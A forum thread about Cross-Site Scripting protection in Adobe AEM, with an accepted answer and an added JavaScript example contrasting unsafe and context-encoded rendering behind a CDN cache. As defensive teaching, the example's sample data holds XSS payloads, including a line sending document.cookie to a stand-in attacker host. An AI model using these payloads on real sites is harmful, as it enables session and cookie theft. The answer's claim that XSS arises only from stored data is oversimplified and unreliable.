
SOLVED

Cross Site Scripting (XSS) related doubt in AEM


Level 8

Hi,

I have very limited/no knowledge of XSS protection in AEM.

Went through the links 

http://tostring.me/270/how-to-prevent-cross-site-scripting-xss-attack-on-your-adobe-cq-based-web-app...

https://docs.adobe.com/content/docs/en/cq/5-6-1/deploying/security_checklist.html#Protect%20against%...

My doubt is 

1] In most cases we will have a CDN/Dispatcher front-ending the AEM websites. So, how is it that some malicious code injected on the user-facing page [let's say a website having a CDN] can be handled at the AEM level? Failing to understand this.

2] Also, went through the OOTB config file /libs/cq/xssprotection/config.xml, but could not understand much.

If you can point to any reference articles/links explaining the same, it would be helpful.

1 Accepted Solution


Correct answer by
Level 9
1. XSS comes into the picture if you are storing something in your database or filesystem. Example: a forms page where users can input data at the time of registration etc. and you are storing it. A CDN/Dispatcher can filter other attacks like DDoS (incoming traffic flooding into your system), and in general it is not meant to validate user-supplied data.
2. You need to be familiar with XML, XSD and AntiSamy to understand the details. https://www.owasp.org/index.php/AntiSamy_Directives

Thanks,

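As an added illustration of point 1 above (example code, not from this thread and not AEM's own code): a small JavaScript model of a component that renders a user profile stored from a registration form, once with raw concatenation and once with per-context output encoding, plus a stand-in for the CDN/Dispatcher cache. The encoders mimic what AEM's XSSAPI / HTL display contexts (html, attribute, scriptString, uri) do; the profile data, the function names and the cache are constructed for the example.

```javascript
// Added example, not from the thread or from AEM: models why XSS is handled at
// render time in AEM rather than at the CDN/Dispatcher. Encoders mimic what
// AEM's XSSAPI / HTL display contexts (html, attribute, scriptString, uri) do.
// The profile, function names and the cache are constructed for this example.

// Body text: the five HTML metacharacters are enough when the output lands
// between tags.
function encodeForHTML(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute value: encode everything but alphanumerics as numeric entities so
// the value cannot close the attribute, whatever quoting the template uses.
function encodeForHTMLAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// Inside a JS string literal: backslash-escape everything but alphanumerics
// (\xHH up to U+00FF, \uHHHH above), so neither a quote nor </script> survives.
function encodeForJSString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// href/src: allow relative URLs and an explicit scheme allow-list; anything
// else (javascript:, data:, vbscript:) becomes an empty string.
function getValidHref(url) {
  const u = String(url).trim();
  if (/[\x00-\x1f]/.test(u)) return ''; // control chars are used to smuggle schemes past naive checks
  const scheme = u.match(/^([A-Za-z][A-Za-z0-9+.-]*):/);
  if (scheme && !['http', 'https', 'mailto'].includes(scheme[1].toLowerCase())) return '';
  return u;
}

// Constructed "stored" data: what a registration form might have written to the
// repository. Every field is hostile.
const storedProfile = {
  displayName: '<img src=x onerror="alert(document.cookie)">',
  tagline: '" onmouseover="alert(1)',
  homepage: 'javascript:alert(1)',
  theme: "'; fetch('https://attacker.example/?c=' + document.cookie); //",
};

// Vulnerable component: raw concatenation of stored values into markup.
function renderProfileUnsafe(p) {
  return `<div class="profile" data-tagline="${p.tagline}">
  <h1>${p.displayName}</h1>
  <a href="${p.homepage}">Homepage</a>
  <script>var theme = '${p.theme}';</script>
</div>`;
}

// Hardened component: each value is encoded for the exact context it lands in.
function renderProfileSafe(p) {
  return `<div class="profile" data-tagline="${encodeForHTMLAttr(p.tagline)}">
  <h1>${encodeForHTML(p.displayName)}</h1>
  <a href="${encodeForHTMLAttr(getValidHref(p.homepage))}">Homepage</a>
  <script>var theme = '${encodeForJSString(p.theme)}';</script>
</div>`;
}

// A CDN/Dispatcher is a cache of rendered bytes: the first render is what every
// later visitor gets. It cannot tell which bytes came from an untrusted field,
// so a payload rendered unencoded once is served to everyone until it is flushed.
function cdnServe(cache, path, render) {
  if (!cache.has(path)) cache.set(path, render());
  return cache.get(path);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(cdnServe(new Map(), '/profile.html', () => renderProfileUnsafe(storedProfile)));
  console.log(cdnServe(new Map(), '/profile.html', () => renderProfileSafe(storedProfile)));
}
```

Run it with node and compare the two outputs: the cached unsafe page carries the payload to every visitor, while the safe page carries the same stored strings rendered inert. The point for the question above is that the encoding happens in the component at render time, before the Dispatcher or CDN ever sees the bytes.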

2 Replies



Level 8

Hi,

Thank you for your reply.

In case we have an AEM site which does not accept any sort of input from users and just renders content, we need not worry about the XSS configuration thing, correct?